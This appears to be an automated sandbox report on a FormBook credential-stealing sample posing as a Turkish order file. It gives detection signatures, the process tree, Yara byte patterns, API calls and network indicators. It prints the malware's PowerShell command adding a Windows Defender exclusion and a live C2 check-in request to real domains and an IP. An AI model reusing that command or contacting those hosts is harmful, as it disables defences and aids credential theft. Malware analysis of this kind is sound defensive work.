Windows Analysis Report
03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe

Overview

General Information

Sample name:03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
renamed because original name is a hash value
Original sample name:03.07.2024-sipari UG01072410 -onka ve Tic a.s.exe
Analysis ID:1467080
MD5:22f3e4a1d074aec6cbc7314efd0f53e0
SHA1:169c6970364d5f8b75efe451a38d7a91b1b47f6b
SHA256:2d6eb4f35570a71972008b6f1e3572aaab6d0ef97e19c42dbc68aeb57b670964
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes itself after installation
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses shutdown.exe to shutdown or reboot the system
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe" MD5: 22F3E4A1D074AEC6CBC7314EFD0F53E0)
    • powershell.exe (PID: 7704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe" MD5: 22F3E4A1D074AEC6CBC7314EFD0F53E0)
      • zkhJmzWnNnFLoIoaAsyqpwQZ.exe (PID: 2000 cmdline: "C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • shutdown.exe (PID: 7824 cmdline: "C:\Windows\SysWOW64\shutdown.exe" MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
          • zkhJmzWnNnFLoIoaAsyqpwQZ.exe (PID: 6492 cmdline: "C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1544 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ae10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x145af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ae10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x145af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d5a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e3a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17b42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", ParentImage: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, ParentProcessId: 7524, ParentProcessName: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", ProcessId: 7704, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", ParentImage: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, ParentProcessId: 7524, ParentProcessName: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", ProcessId: 7704, ProcessName: powershell.exe
            Timestamp:07/03/24-17:52:48.068224
            SID:2855465
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            AV Detection

            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeReversingLabs: Detection: 28%
            Source: Yara matchFile source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeJoe Sandbox ML: detected
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: fTTh.pdb source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000000.2140611303.0000000000EAE000.00000002.00000001.01000000.0000000C.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000002.2563006189.0000000000EAE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2215943559.0000000003797000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2213972420.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: shutdown.pdbGCTL source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214174481.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562237583.0000000001458000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, shutdown.exe, 0000000D.00000003.2215943559.0000000003797000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2213972420.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: shutdown.pdb source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214174481.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562237583.0000000001458000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fTTh.pdbSHA256x source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0324C240 FindFirstFileW,FindNextFileW,FindClose,13_2_0324C240
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 4x nop then jmp 02CD4B0Ch0_2_02CD46DE
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 4x nop then xor eax, eax13_2_03239780
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 4x nop then mov ebx, 00000004h13_2_03C9053E

            Networking

            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49715 -> 91.195.240.19:80
            Source: Joe Sandbox ViewIP Address: 91.195.240.19 91.195.240.19
            Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ucdm/?j2=EKdombQUikql/e8x5w/b0WRCZZ7GjewvGt5yqJ62oMuwgaHfKWbffkwAJSwjzlHKlyNbdgTciiNebF1Tnxx1ssE7dAszzRsyY0LYOFUjrmAhIYA2gw==&NbL=5XSdkb2PqtnPh8PP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fungusbus.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.betful.site
            Source: global trafficDNS traffic detected: DNS query: www.deviexp.com
            Source: global trafficDNS traffic detected: DNS query: www.fungusbus.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1329890365.0000000002F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000344B000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2561874080.000000000341E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000344B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: shutdown.exe, 0000000D.00000003.2489693718.000000000824A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000341E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000341E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10333NB
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000341E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000344B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            Source: Yara matchFile source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.2dbc398.1.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.7540000.3.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0042B863 NtClose,5_2_0042B863
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772B60 NtClose,LdrInitializeThunk,5_2_01772B60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01772DF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01772C70
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017735C0 NtCreateMutant,LdrInitializeThunk,5_2_017735C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01774340 NtSetContextThread,5_2_01774340
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01774650 NtSuspendThread,5_2_01774650
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772BF0 NtAllocateVirtualMemory,5_2_01772BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772BE0 NtQueryValueKey,5_2_01772BE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772BA0 NtEnumerateValueKey,5_2_01772BA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772B80 NtQueryInformationFile,5_2_01772B80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772AF0 NtWriteFile,5_2_01772AF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772AD0 NtReadFile,5_2_01772AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772AB0 NtWaitForSingleObject,5_2_01772AB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772D30 NtUnmapViewOfSection,5_2_01772D30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772D10 NtMapViewOfSection,5_2_01772D10
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772D00 NtSetInformationFile,5_2_01772D00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772DD0 NtDelayExecution,5_2_01772DD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772DB0 NtEnumerateKey,5_2_01772DB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772C60 NtCreateKey,5_2_01772C60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772C00 NtQueryInformationProcess,5_2_01772C00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772CF0 NtOpenProcess,5_2_01772CF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772CC0 NtQueryVirtualMemory,5_2_01772CC0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772CA0 NtQueryInformationToken,5_2_01772CA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772F60 NtCreateProcessEx,5_2_01772F60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_01772F30 NtCreateSection,5_2_01772F30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_01772FE0 NtCreateFile,5_2_01772FE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_01772FB0 NtResumeThread,5_2_01772FB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_01772FA0 NtQuerySection,5_2_01772FA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_01772F90 NtProtectVirtualMemory,5_2_01772F90
